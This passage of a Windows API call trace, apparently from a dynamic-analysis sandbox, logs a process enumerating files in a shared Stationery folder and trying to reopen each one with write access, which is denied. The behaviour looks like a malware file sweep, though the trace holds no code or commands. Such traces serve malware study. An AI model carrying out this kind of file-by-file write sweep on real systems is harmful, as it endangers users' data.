1 [0102.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a498 [0102.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.260] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0102.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.260] AreFileApisANSI () returned 1 [0102.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg", lpUsedDefaultChar=0x0) returned 69 [0102.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0102.261] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.261] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0102.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0102.261] AreFileApisANSI () returned 1 [0102.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a238 [0102.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 69 [0102.261] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.261] GetFileType (hFile=0x27c) returned 0x1 [0102.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0102.261] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.262] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.262] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.262] CloseHandle (hObject=0x27c) returned 1 [0102.262] AreFileApisANSI () returned 1 [0102.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ae18 [0102.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 69 [0102.262] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.262] GetLastError () returned 0x5 [0102.262] GetLastError () returned 0x5 [0102.262] SetLastError (dwErrCode=0x5) [0102.262] GetLastError () returned 0x5 [0102.262] SetLastError (dwErrCode=0x5) [0102.262] GetLastError () returned 0x5 [0102.262] SetLastError (dwErrCode=0x5) [0102.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0102.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0102.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.263] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Green Bubbles.htm", cAlternateFileName="")) returned 1 [0102.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0102.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0102.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0102.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0102.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0102.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0102.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0102.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0102.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0102.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0102.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0102.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0102.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0102.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0102.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0102.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cce0 [0102.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.264] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.264] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.264] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cce0 | out: hHeap=0x20000) returned 1 [0102.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0102.264] AreFileApisANSI () returned 1 [0102.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm", lpUsedDefaultChar=0x0) returned 76 [0102.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0102.264] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.264] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0102.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0102.264] AreFileApisANSI () returned 1 [0102.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0102.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85620 [0102.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x85620, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 76 [0102.264] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.264] GetFileType (hFile=0x27c) returned 0x1 [0102.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85620 | out: hHeap=0x20000) returned 1 [0102.264] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.265] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.265] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.265] CloseHandle (hObject=0x27c) returned 1 [0102.265] AreFileApisANSI () returned 1 [0102.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0102.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x851c0 [0102.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x851c0, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 76 [0102.265] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.265] GetLastError () returned 0x5 [0102.265] GetLastError () returned 0x5 [0102.265] SetLastError (dwErrCode=0x5) [0102.265] GetLastError () returned 0x5 [0102.265] SetLastError (dwErrCode=0x5) [0102.265] GetLastError () returned 0x5 [0102.266] SetLastError (dwErrCode=0x5) [0102.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x851c0 | out: hHeap=0x20000) returned 1 [0102.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0102.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0102.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0102.266] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.266] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.266] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1906, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="GreenBubbles.jpg", cAlternateFileName="")) returned 1 [0102.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0102.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0102.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0102.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0102.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0102.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0102.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0102.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0102.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0102.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0102.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0102.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0102.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0102.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0102.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0102.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0102.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0102.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.266] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0102.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.267] AreFileApisANSI () returned 1 [0102.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg", lpUsedDefaultChar=0x0) returned 75 [0102.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0102.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.267] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0102.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0102.267] AreFileApisANSI () returned 1 [0102.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0102.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85440 [0102.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x85440, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 75 [0102.267] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.269] GetFileType (hFile=0x27c) returned 0x1 [0102.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85440 | out: hHeap=0x20000) returned 1 [0102.269] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.270] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.270] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.270] CloseHandle (hObject=0x27c) returned 1 [0102.270] AreFileApisANSI () returned 1 [0102.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0102.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85e40 [0102.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x85e40, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 75 [0102.271] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.271] GetLastError () returned 0x5 [0102.271] GetLastError () returned 0x5 [0102.271] SetLastError (dwErrCode=0x5) [0102.271] GetLastError () returned 0x5 [0102.271] SetLastError (dwErrCode=0x5) [0102.271] GetLastError () returned 0x5 [0102.271] SetLastError (dwErrCode=0x5) [0102.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85e40 | out: hHeap=0x20000) returned 1 [0102.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0102.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0102.271] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.271] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.271] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xeb, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Hand Prints.htm", cAlternateFileName="")) returned 1 [0102.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0102.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0102.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0102.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0102.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0102.272] 